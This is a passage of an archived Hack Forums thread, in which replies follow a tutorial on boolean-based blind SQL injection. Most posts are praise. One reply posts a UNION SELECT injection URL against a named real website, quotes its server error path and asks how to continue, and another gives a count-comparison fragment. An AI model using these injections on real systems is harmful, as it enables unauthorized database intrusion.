can get the job done if all else fails.</div><div class="post_meta" id="post_meta_31897756"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1377865" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=31897756" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31908507" id="pid31908507"></a><table class="tborder" style="margin-top: 5px; " id="post_31908507" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-12-2013, 01:49 AM <span id="edited_by_31908507"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=31908507#pid31908507">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=777620"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/trolldance.jpg" alt="" height="41" width="38"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=777620"><span class="group9">-=Hack0pz=-</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">&gt; Previously -=Hack0pz=-<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 102<br>Posts: 3,004<br>Joined: Apr 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=777620"><strong class="reputation_positive">83</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31908507">Have read the whole part... Very interesting, great job mate! :)</div><div class="post_meta" id="post_meta_31908507"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=777620" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=31908507" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31911108" id="pid31911108"></a><table class="tborder" style="margin-top: 5px; " id="post_31911108" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-12-2013, 05:18 AM <span id="edited_by_31911108"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=31911108#pid31911108">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/5Mbiw.jpg" alt="" height="86" width="75"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1298994"><span class="group29">Zixem</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">75, jez gimme two months<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 110<br>Posts: 1,309<br>Joined: May 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1298994"><strong class="reputation_positive">341</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31911108">I'll read that later. looks good ajkaro.<br>You never disappoint me :3</div><div class="post_meta" id="post_meta_31911108"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://zixem.altervista.org/" target="_blank" class="bitButton" rel="nofollow" title="Visit this user's website">WWW</a> <a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1298994" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=31911108" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid31914824" id="pid31914824"></a><table class="tborder" style="margin-top: 5px; " id="post_31914824" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-12-2013, 09:22 AM <span id="edited_by_31914824"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=31914824#pid31914824">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,185<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_31914824"><blockquote><cite><span>(04-12-2013 05:18 AM)</span>Zixem Wrote: <a href="http://www.hackforums.net/showthread.php?pid=31911108#pid31911108" class="quick_jump">►</a></cite>I'll read that later. looks good ajkaro.<br>You never disappoint me :3</blockquote><br>Long time no see Zixem .... <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_31914824"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=31914824" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32107646" id="pid32107646"></a><table class="tborder" style="margin-top: 5px; " id="post_32107646" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-20-2013, 02:01 PM <span id="edited_by_32107646"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=32107646#pid32107646">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 61<br>Posts: 1,897<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">121</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32107646">Excellent tutorial my friend.<br>I knew of blind SQLi of course, but this is definitely a new method. Kind of rare in my experience, but it's good to know.<br>I had this bookmarked for a few days and just got time to give the first part a read. 10/10 checking out the other parts now. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_32107646"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=32107646" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid32118741" id="pid32118741"></a><table class="tborder" style="margin-top: 5px; " id="post_32118741" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-21-2013, 01:04 AM <span id="edited_by_32118741"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=32118741#pid32118741">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,185<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32118741"><blockquote><cite><span>(04-20-2013 02:01 PM)</span>hackforumspang Wrote: <a href="http://www.hackforums.net/showthread.php?pid=32107646#pid32107646" class="quick_jump">►</a></cite>Excellent tutorial my friend.<br>I knew of blind SQLi of course, but this is definitely a new method. Kind of rare in my experience, but it's good to know.<br>I had this bookmarked for a few days and just got time to give the first part a read. 10/10 checking out the other parts now. <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></blockquote><br>Thanks my friend for kind words. I am glad you like it <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_32118741"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=32118741" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid36352180" id="pid36352180"></a><table class="tborder" style="margin-top: 5px; " id="post_36352180" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-16-2013, 11:48 AM <span id="edited_by_36352180"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=36352180#pid36352180">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1912756"><span class="group2">syber33</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 32<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1912756"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_36352180"><a href="http://www.1snsc.sk/index.php?action=module&amp;id=mod_content&amp;content_id=-1687%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14--" target="_blank">http://www.1snsc.sk/index.php?action=mod...12,13,14--</a><br><br>if
 you type ...,13,14,15-- error will be Warning: mysql_fetch_array() 
expects parameter 1 to be resource, boolean given in 
/data/web/1snsc.sk/web/modules/mod_content/index.php on line 58 there is
 boolean in error will your tuts help for this?Or there is other 
problem?</div><div class="post_meta" id="post_meta_36352180"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1912756" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=36352180" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid36364992" id="pid36364992"></a><table class="tborder" style="margin-top: 5px; " id="post_36364992" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">11-17-2013, 12:39 AM <span id="edited_by_36364992"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=36364992#pid36364992">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2007745"><span style="color:#383838">hamzaisgay</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 12<br>Posts: 315<br>Joined: Oct 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2007745"><strong class="reputation_negative">-10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_36364992">ooo awsome tutorial hoping to see more from you.<br><br>this is cool tutorial thanks alot man :D<br>rep+</div><div class="post_meta" id="post_meta_36364992"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2007745" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=36364992" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid36884227" id="pid36884227"></a><table class="tborder" style="margin-top: 5px; " id="post_36884227" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">12-10-2013, 02:52 PM <span id="edited_by_36884227"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;pid=36884227#pid36884227">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=241908"><span class="group9">Naww</span></a></span></strong> <img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">L33t Member<br><span class="userstars"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 75<br>Posts: 1,763<br>Joined: Mar 2010<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=241908"><strong class="reputation_positive">13</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_36884227">At the part we are counting de number of columns, can we do somethin like this.<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>61&lt; ( select count(*) .. or like this&nbsp;&nbsp;61 &gt; ( select count(*) ..</code></div></div></div><div class="post_meta" id="post_meta_36884227"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=241908" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306&amp;replyto=36884227" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3385306&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3385306" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3385306">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3385306" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3385306&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3385306.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BTutorial%5D%20boolean%20based%20blind%20SQLi%20using%20regexp%20with%20binary%20search%20-%20part%20%231%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->